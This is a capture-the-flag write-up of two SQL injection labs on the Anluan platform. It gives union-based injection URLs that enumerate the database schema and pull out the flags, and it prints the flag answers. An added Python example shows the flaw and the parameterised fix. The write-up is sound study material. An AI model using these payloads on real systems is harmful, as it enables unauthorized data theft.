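Anluan (安鸾) SQL Series: Numeric and String Injection
涂寐

Disclaimer: The techniques, ideas and tools covered in this article are for security-oriented study and exchange only. No one may use them for illegal purposes or for profit; anyone who does bears the consequences themselves!
This article was first published on 涂寐's Blogs: https://0xtlu.github.io/article/81e90e43.html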

SQL Numeric GET Injection 01

Vulnerable URL: http://47.103.94.191:8001/bug/sql_injection/sql_num.php

Hint: the flag is in the database

# Test the injection type -- numeric
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=1&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 and 1=2&submit=submit
# Test the column count -- 3
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 3&submit=submit
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=1 order by 4&submit=submit
# Get the current database -- dwvs
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,database()&submit=submit
# List all tables in the dwvs database -- flag
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='dwvs'&submit=submit
# List the columns of the flag table -- id, flag
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,group_concat(COLUMN_NAME) from information_schema.columns where table_name='flag'&submit=submit
# Read the value of the flag column -- flag{05486400c4ac17fef478f73504934212}
http://47.103.94.191:8001/bug/sql_injection/sql_num.php?id=-1 union select 1,2,flag from dwvs.flag&submit=submit

SQL String Injection

Vulnerable URL: http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=1&submit=submit

Hint: the flag is in the database
  1. ' and '1'='1 to test the injection type

    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' and '1'='1&submit=submit
  2. order by to test the column count

    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' order by 4%23&submit=submit

  3. Get all databases

    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=1' union select 1,2,group_concat(table_schema) from information_schema.tables%23&submit=submit
  4. All tables in the dwvs database

    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='dwvs'%23&submit=submit

  5. List the columns of the flag table

    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' union select 1,2,group_concat(COLUMN_NAME) from information_schema.columns where table_name='flag'%23&submit=submit

  6. Retrieve flag{3fac9e7cf81d710fd1a15f011d60739f}

    http://47.103.94.191:8005//bug/sql_injection/sql_string.php?title=2' union select 1,2,flag from dwvs.flag%23&submit=submit
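
Added example, not part of the original post and not the lab's code: the lab's PHP source is not shown, so this Python sketch uses SQLite in place of MySQL to show why the numeric and string probes above change the query when input is concatenated into SQL, and how type validation plus bound parameters stop them. The `news` table, the function names and the flag value are constructed assumptions.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the lab database (SQLite, not the lab's MySQL).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'first', 'hello'), (2, 'second', 'world');
        CREATE TABLE flag (id INTEGER, flag TEXT);
        INSERT INTO flag VALUES (1, 'flag{constructed}');
    """)
    return db

def by_id_vulnerable(db, raw_id):
    # Numeric context: the parameter is pasted into the SQL text unquoted,
    # so "1 and 1=2" or "-1 union select ..." becomes part of the statement.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def by_id_safe(db, raw_id):
    # Enforce the expected type first, then bind the value as a parameter.
    try:
        value = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (value,)).fetchall()

def by_title_vulnerable(db, raw_title):
    # String context: a single quote in the input closes the literal early.
    sql = "SELECT id, title, body FROM news WHERE title = '" + raw_title + "'"
    return db.execute(sql).fetchall()

def by_title_safe(db, raw_title):
    # The bound value is compared as data; quotes in it have no SQL meaning.
    sql = "SELECT id, title, body FROM news WHERE title = ?"
    return db.execute(sql, (raw_title,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ("1 and 1=1", "1 and 1=2", "-1 union select 1,2,flag from flag"):
        print(repr(probe), by_id_vulnerable(db, probe), by_id_safe(db, probe))
    for probe in ("first' and '1'='1", "first' and '1'='2"):
        print(repr(probe), by_title_vulnerable(db, probe), by_title_safe(db, probe))
```

In the vulnerable functions the true/false probes flip the result set, which is the behaviour the type tests above rely on; in the safe functions every probe returns no rows.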
